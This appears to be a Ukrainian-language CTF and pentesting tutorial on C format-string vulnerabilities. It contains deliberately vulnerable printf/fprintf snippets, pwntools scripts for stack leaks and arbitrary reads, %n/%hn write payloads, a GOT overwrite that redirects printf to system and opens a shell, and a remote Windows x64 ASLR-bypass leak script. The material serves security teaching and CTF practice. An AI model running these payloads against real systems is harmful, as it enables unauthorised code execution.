Format Strings

Reading time: 10 minutes

Основна інформація

У C printf — функція, яку можна використовувати для виведення рядка. Першим параметром, який очікує ця функція, є сирий текст з форматерами. Наступні параметри — це значення, якими підставляються форматери у сирому тексті.

Інші вразливі функції: sprintf() та fprintf().

Вразливість виникає, коли attacker text is used as the first argument до цієї функції. attacker зможе створити спеціальний вхід, який зловживає можливостями рядка формату printf для читання та записувати будь-які дані в будь-яку адресу (readable/writable). Таким чином можна execute arbitrary code.

Форматери:

%08x —> 8 hex bytes
%d —> Entire
%u —> Unsigned
%s —> String
%p —> Pointer
%n —> Number of written bytes
%hn —> Occupies 2 bytes instead of 4
<n>$X —> Direct access, Example: ("%3$d", var1, var2, var3) —> Access to var3

Приклади:

• Вразливий приклад:

char buffer[30];
gets(buffer);  // Dangerous: takes user input without restrictions.
printf(buffer);  // If buffer contains "%x", it reads from the stack.

• Звичайне використання:

int value = 1205;
printf("%x %x %x", value, value, value);  // Outputs: 4b5 4b5 4b5

• З відсутніми аргументами:

printf("%x %x %x", value);  // Unexpected output: reads random values from the stack.

• fprintf вразливий:

#include <stdio.h>

int main(int argc, char *argv[]) {
char *user_input;
user_input = argv[1];
FILE *output_file = fopen("output.txt", "w");
fprintf(output_file, user_input); // The user input can include formatters!
fclose(output_file);
return 0;
}

Доступ до вказівників

Формат %<n>$x, де n — це число, дозволяє вказати printf вибрати n-й параметр (зі stack). Отже, якщо ви хочете прочитати 4-й параметр зі stack за допомогою printf, ви можете зробити так:

printf("%x %x %x %x")

і ви б читали від першого до четвертого параметра.

Або ви могли б зробити:

printf("%4$x")

і безпосередньо прочитати четвертий.

Notice that the attacker controls the printf параметр, що, по суті, означає, що його введення опиниться в stack під час виклику printf, а це дозволяє йому записувати конкретні адреси пам'яті в stack.

Arbitrary Read

Можна використати форматтер %n$s, щоб змусити printf отримати адресу, розташовану в n-й позиції, перейти за нею та вивести її як рядок (виводити до зустрічі 0x00). Отже, якщо базова адреса бінарного файлу — 0x8048000, і ми знаємо, що введення користувача починається на 4-й позиції в stack, можна вивести початок бінарника за допомогою:

from pwn import *

p = process('./bin')

payload = b'%6$s' #4th param
payload += b'xxxx' #5th param (needed to fill 8bytes with the initial input)
payload += p32(0x8048000) #6th param

p.sendline(payload)
log.info(p.clean()) # b'\x7fELF\x01\x01\x01||||'

Знайти offset

Щоб знайти offset до вашого введення, ви можете відправити 4 або 8 байтів (0x41414141) після яких додати %1$x і збільшувати значення, поки не отримаєте A's.

# Code from https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak

from pwn import *

# Iterate over a range of integers
for i in range(10):
# Construct a payload that includes the current integer as offset
payload = f"AAAA%{i}$x".encode()

# Start a new process of the "chall" binary
p = process("./chall")

# Send the payload to the process
p.sendline(payload)

# Read and store the output of the process
output = p.clean()

# Check if the string "41414141" (hexadecimal representation of "AAAA") is in the output
if b"41414141" in output:
# If the string is found, log the success message and break out of the loop
log.success(f"User input is at offset : {i}")
break

# Close the process
p.close()

Наскільки корисно

Arbitrary reads можуть бути корисні для:

• Dump the binary з пам'яті
• Access specific parts of memory where sensitive info is stored (наприклад canaries, encryption keys або custom passwords, як у цьому CTF challenge)

Arbitrary Write

Форматтер %<num>$n writes the number of written bytes в вказану адресу, яка знаходиться в параметрі у стеку. Якщо атакуючий може вивести стільки символів, скільки захоче за допомогою printf, він зможе змусити %<num>$n записати довільне число у довільну адресу.

На щастя, щоб записати число 9999, не потрібно додавати 9999 "A" до вводу; можна використати форматтер %.<num-write>%<num>$n щоб записати число <num-write> в адресу, на яку вказує позиція num.

AAAA%.6000d%4\$n —> Write 6004 in the address indicated by the 4º param
AAAA.%500\$08x —> Param at offset 500

Проте зауважте, що зазвичай, щоб записати адресу таку як 0x08049724 (що є ВЕЛИКИМ числом для одноразового запису), використовується $hn замість $n. Це дозволяє записувати лише 2 байти. Отже, цю операцію виконують двічі: для старших 2 байтів адреси й для молодших.

Тому ця вразливість дозволяє записати будь-що у будь-яку адресу (arbitrary write).

У цьому прикладі мета — перезаписати адресу функції в таблиці GOT, яка буде викликана пізніше. Хоча це також можна використати з іншими arbitrary write → exec техніками:

Write What Where 2 Exec

Ми збираємося перезаписати функцію, яка отримує свої аргументи від користувача, і вказати її на функцію system.
Як згадувалося, щоб записати адресу зазвичай потрібно 2 кроки: спочатку записують 2 байти адреси, а потім інші 2. Для цього використовується $hn.

• HOB — це 2 старші байти адреси
• LOB — це 2 молодші байти адреси

Тоді, через те, як працює format string, потрібно спочатку записати найменше з [HOB, LOB] а потім інше.

Якщо HOB < LOB
[address+2][address]%.[HOB-8]x%[offset]\$hn%.[LOB-HOB]x%[offset+1]

Якщо HOB > LOB
[address+2][address]%.[LOB-8]x%[offset+1]\$hn%.[HOB-LOB]x%[offset]

HOB LOB HOB_shellcode-8 NºParam_dir_HOB LOB_shell-HOB_shell NºParam_dir_LOB

python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + "%.15408x" + "%5$hn"'

Шаблон Pwntools

Ви можете знайти шаблон, щоб підготувати exploit для цього типу вразливості в:

Format Strings Template

Або цей базовий приклад з here:

from pwn import *

elf = context.binary = ELF('./got_overwrite-32')
libc = elf.libc
libc.address = 0xf7dc2000       # ASLR disabled

p = process()

payload = fmtstr_payload(5, {elf.got['printf'] : libc.sym['system']})
p.sendline(payload)

p.clean()

p.sendline('/bin/sh')

p.interactive()

Format Strings to BOF

Можна зловживати операціями запису вразливості format string, щоб записувати в адреси stack і експлуатувати тип вразливості buffer overflow.

Windows x64: Format-string leak to bypass ASLR (no varargs)

На Windows x64 перші чотири цілочисельні/вказівникові параметри передаються в регістри: RCX, RDX, R8, R9. У багатьох вразливих місцях виклику рядок, контрольований атакуючим, використовується як аргумент формату, але жодні варіативні аргументи не передаються, наприклад:

// keyData is fully controlled by the client
// _snprintf(dst, len, fmt, ...)
_snprintf(keyStringBuffer, 0xff2, (char*)keyData);

Оскільки жодні varargs не передаються, будь-яке перетворення типу "%p", "%x", "%s" змусить CRT прочитати наступний варіативний аргумент з відповідного регістру. За Microsoft x64 calling convention перше таке читання для "%p" відбувається з R9. Будь-яке тимчасове значення в R9 на момент виклику буде виведено. На практиці це часто дає leak стабільного вказівника всередині модуля (наприклад, вказівник на локальний/глобальний об'єкт, раніше поміщений в R9 оточуючим кодом або значення, збережене callee), що можна використати для відновлення module base і обходу ASLR.

Практичний робочий процес:

• Впровадьте нешкідливий формат, наприклад "%p " на самому початку рядка, контрольованого атакуючим, щоб перше перетворення виконалося до будь-якого фільтрування.
• Захопіть leak-вказівник, визначте статичний офсет цього об'єкта всередині модуля (шляхом reversing з символами або локальної копії), та відновіть image base як leak - known_offset.
• Повторно використайте цю базу для обчислення абсолютних адрес для ROP gadgets і IAT entries віддалено.

Example (abbreviated python):

from pwn import remote

# Send an input that the vulnerable code will pass as the "format"
fmt = b"%p " + b"-AAAAA-BBB-CCCC-0252-"  # leading %p leaks R9
io = remote(HOST, 4141)
# ... drive protocol to reach the vulnerable snprintf ...
leaked = int(io.recvline().split()[2], 16)   # e.g. 0x7ff6693d0660
base   = leaked - 0x20660                     # module base = leak - offset
print(hex(leaked), hex(base))

Примітки:

• Точне зміщення, яке потрібно відняти, знаходять один раз під час локального реверсингу і потім повторно використовують (той самий бінарний файл/версія).
• Якщо "%p" не виводить валідний вказівник з першої спроби, спробуйте інші специфікатори ("%llx", "%s") або кілька конверсій ("%p %p %p"), щоб опитати інші регістри/стек аргументів.
• Цей патерн специфічний для Windows x64 calling convention та реалізацій printf-family, які зчитують неіснуючі varargs з регістрів, коли форматний рядок їх запитує.

Ця техніка надзвичайно корисна для bootstrap ROP на Windows сервісах, скомпільованих з ASLR і без очевидних memory disclosure primitives.

Інші приклади та посилання

• https://ir0nstone.gitbook.io/notes/types/stack/format-string
• https://www.youtube.com/watch?v=t1LH9D5cuK4
• https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak
• https://guyinatuxedo.github.io/10-fmt_strings/pico18_echo/index.html
• 32 bit, no relro, no canary, nx, no pie, базове використання format strings для leak flag зі stack (не потрібно змінювати execution flow)
• https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html
• 32 bit, relro, no canary, nx, no pie, format string для перезапису адреси fflush на win function (ret2win)
• https://guyinatuxedo.github.io/10-fmt_strings/tw16_greeting/index.html
• 32 bit, relro, no canary, nx, no pie, format string для запису адреси всередину main у .fini_array (щоб flow повернувся ще один раз) і запису адреси system у GOT, яка вказує на strlen. Коли flow повернеться в main, strlen буде виконаний з user input і, оскільки вказує на system, виконає передані команди.

Джерела

• HTB Reaper: Format-string leak + stack BOF → VirtualAlloc ROP (RCE)
• x64 calling convention (MSVC)